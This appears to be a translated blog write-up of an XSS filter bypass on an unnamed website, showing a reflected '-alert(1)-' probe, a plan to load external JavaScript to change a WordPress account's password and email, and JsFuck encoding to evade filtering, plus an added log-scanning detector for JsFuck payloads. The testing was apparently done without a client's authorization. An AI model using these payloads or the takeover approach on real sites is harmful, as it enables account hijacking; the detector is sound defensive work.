
How I bypassed an XSS filter like a PRO (advanced XSS methods)

Source: compiled by this site    Author: Anonymous    Date: 2019-11-16

A code injection vulnerability in JavaScript code is a real headache. Because this was not a penetration test we performed for an enterprise client, we can publish the technical details directly.
In short, we found a security flaw on a website, and after some time spent analysing the code we located an endpoint with an XSS vulnerability:
http://website.com/dir/subdir
The JavaScript code at that endpoint contains a call of the following form:
function("/DIR/SUBDIR",params);
After scanning with Burp Suite, we found that appending "-alert(1)-" to the end of the URL (http://website.com/dir/subdir/"-alert(1)-") reflects into the page; the browser reports "unable to find function ALERT(1)":

Next, we needed to test exactly what the server filters out, for example "", "//", "\" or ".".
Finding a usable payload
We also found a few solutions, all of them related to jsfuck.com.

Of course, on this site we could already execute alert(1), but that is only a low-severity XSS; we wanted to escalate the finding to a high or critical one. To do that we needed to load an external JS file and perform arbitrary web actions without any user interaction.
The image below shows a WordPress payload: our goal was to load an external JS file on the target site and change the account password and e-mail address:

Building the JsFuck payload: in JsFuck, a simple alert(1) is converted into a long string built solely from the six characters [ ] ( ) ! + (with [, ] and + URL-encoded as %5B, %5D and %2B in the request).
If I wanted alert(document.cookie), the JsFuck code would run to roughly 13,000 characters. I found that once the input exceeds about 2500-2700 characters, the target server returns a "400 error".
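An added example, not from the original article: a request-path check a defender could run over web-server logs to spot this class of payload. JsFuck output uses only the six characters [ ] ( ) ! +, so the check flags paths whose URL-decoded form contains a long run made up of nothing else; the threshold of 40 and the sample paths are constructed for this example.

```javascript
// Added example, not from the original article: detect JsFuck-style payloads in
// request paths. JsFuck output uses only the six characters [ ] ( ) ! +, so a
// long run of them in a URL-decoded path is a strong signal.
const JSFUCK_CHARS = "[]()!+";

// Length of the longest run of consecutive JsFuck-alphabet characters.
function longestJsFuckRun(s) {
  let best = 0, cur = 0;
  for (const ch of s) {
    cur = JSFUCK_CHARS.includes(ch) ? cur + 1 : 0;
    if (cur > best) best = cur;
  }
  return best;
}

// URL-decode; a malformed %xx sequence (URIError) leaves the raw path in place
// rather than dropping the request from inspection.
function decodePath(path) {
  try { return decodeURIComponent(path); } catch (e) { return path; }
}

// MIN_RUN is a constructed threshold: ordinary paths do not contain 40 consecutive
// bracket/paren/bang/plus characters, while even short JsFuck fragments do.
const MIN_RUN = 40;

function inspectRequestPath(path, minRun = MIN_RUN) {
  const decoded = decodePath(path);
  const run = longestJsFuckRun(decoded);
  return { decodedLength: decoded.length, longestRun: run, suspicious: run >= minRun };
}

// Genuine JsFuck fragment: []["flat"] spelled from (![]+[]) = "false" and (!![]+[]) = "true".
const JSFUCK_FLAT = "[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]";

// Constructed sample paths: a benign path, the article's plain probe, and a JsFuck
// carrier in the same "-...-" position, URL-encoded as it would appear in a log.
const SAMPLE_PATHS = {
  benign: "/dir/subdir/report-2019-11-16",
  probe: '/dir/subdir/"-alert(1)-"',
  jsfuck: "/dir/subdir/" + encodeURIComponent('"-' + JSFUCK_FLAT + '-"'),
};

for (const [name, path] of Object.entries(SAMPLE_PATHS)) {
  console.log(name, inspectRequestPath(path));
}
```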
Next, let's look at how JsFuck works:
const SIMPLE = {
  'false':      '![]',
  'true':       '!0',
  'undefined':  '0[0]',
  'NaN':        '+[!0]',
  'Infinity':   '+(+!0+(!0+[])[!0+!0+!0]+[+!0]+[0]+[0]+[0])' // +"1e1000"
};
const CONSTRUCTORS = { // the excerpt is cut off here at the article's page break
